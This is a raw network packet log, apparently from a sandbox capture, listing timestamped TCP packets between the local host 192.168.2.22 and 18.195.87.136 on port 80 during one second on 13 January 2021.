Jan 13, 2021 17:17:31.900382042 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900388002 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900398016 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900405884 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900413990 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900423050 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900439024 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900443077 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900455952 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900471926 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900846004 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901456118 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901485920 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901504993 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901520967 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901525974 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901535034 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901545048 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901552916 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901562929 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901572943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901581049 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901582003 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901597977 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901598930 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901613951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901623011 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901633024 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901643038 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901659012 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901671886 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901679993 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901699066 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901711941 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901715994 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901721001 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901725054 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901734114 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901746988 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901751995 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901755095 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901771069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901772022 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901788950 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901793957 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901812077 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901812077 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901829958 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901833057 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901848078 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901851892 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901868105 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901870966 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901885986 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901885986 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901904106 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901906013 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901920080 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901921034 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901940107 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901942968 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901952982 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901962042 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901977062 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.901982069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.901993036 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902002096 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902017117 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902020931 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902033091 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902041912 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902056932 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902057886 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902074099 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902075052 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902090073 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902095079 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.902107000 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902122021 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.902498007 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.941514969 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.941541910 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.941617012 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942121983 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942145109 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942163944 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942168951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942181110 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942188025 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942198992 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942215919 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942218065 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942234993 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942248106 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942276955 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942301035 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942317963 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942322016 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942334890 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942339897 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942351103 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942354918 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942373991 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942379951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942395926 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942414045 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942430019 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942436934 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942445993 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942450047 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942465067 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942468882 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942473888 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942491055 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942507029 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942508936 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942527056 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942529917 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942540884 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942545891 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942563057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942564011 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942581892 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942586899 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942595005 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942600012 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942617893 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942616940 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942632914 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942639112 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942656040 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942657948 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942675114 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942677975 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942696095 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942697048 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942713022 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942715883 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942724943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942732096 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942743063 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942750931 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942768097 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942769051 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942790031 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942796946 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942805052 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942810059 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942814112 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942827940 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942846060 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942850113 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942861080 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942863941 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942876101 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942881107 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942898035 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942900896 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942909002 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942917109 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942938089 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942938089 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942949057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942956924 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942970991 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.942972898 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942994118 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.942996979 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943002939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943011999 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943027973 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943033934 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943043947 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943048000 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943062067 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943068027 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943078995 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943084955 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943094015 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943104029 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943119049 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943120003 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943135977 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943136930 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943151951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943155050 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943171978 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943172932 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943187952 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943191051 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943197966 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943205118 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943214893 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943227053 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943238974 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943244934 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943253994 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943262100 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943279982 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943284035 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943296909 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943303108 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943310976 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943314075 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943325043 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943331003 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943339109 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943347931 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943366051 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943367004 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943377972 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943386078 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943397999 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943404913 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943422079 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943424940 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943438053 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943454981 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943463087 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943471909 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943481922 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943491936 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943497896 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943511963 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943517923 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943528891 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943531036 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943547010 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943547964 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943564892 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943564892 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943578005 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943583012 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943597078 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943602085 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943609953 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943619967 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943636894 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943640947 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943658113 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943661928 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943670034 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943677902 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943694115 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943694115 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943711042 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943715096 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943722010 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943730116 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943737030 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943746090 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943763971 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943767071 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943782091 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943783045 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943794012 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943803072 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943810940 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943820953 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943837881 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943836927 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943851948 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943856001 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943873882 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943877935 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943886042 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943891048 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.943903923 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.943922997 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982239008 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982278109 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982304096 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982306004 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982325077 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982340097 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982363939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982706070 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982733965 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982754946 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982758045 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982768059 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982784033 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982794046 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982806921 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982827902 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982831955 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982844114 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982853889 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982861996 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982881069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982892036 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982904911 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982917070 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982928991 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.982929945 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.982969999 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984256983 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984489918 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984513998 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984529972 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984546900 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984546900 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984565020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984579086 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984582901 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984586954 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984601974 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984606028 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984620094 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984625101 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984630108 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984641075 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984649897 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984659910 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984677076 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984687090 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984693050 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984703064 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984709978 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984720945 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984726906 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984734058 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984745979 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984756947 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984761953 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984765053 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984778881 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984787941 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984805107 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984810114 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984822989 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984827995 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984837055 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984850883 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984860897 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984862089 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984877110 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984893084 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.984900951 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.984909058 CET	49165	80	192.168.2.22	18.195.87.136
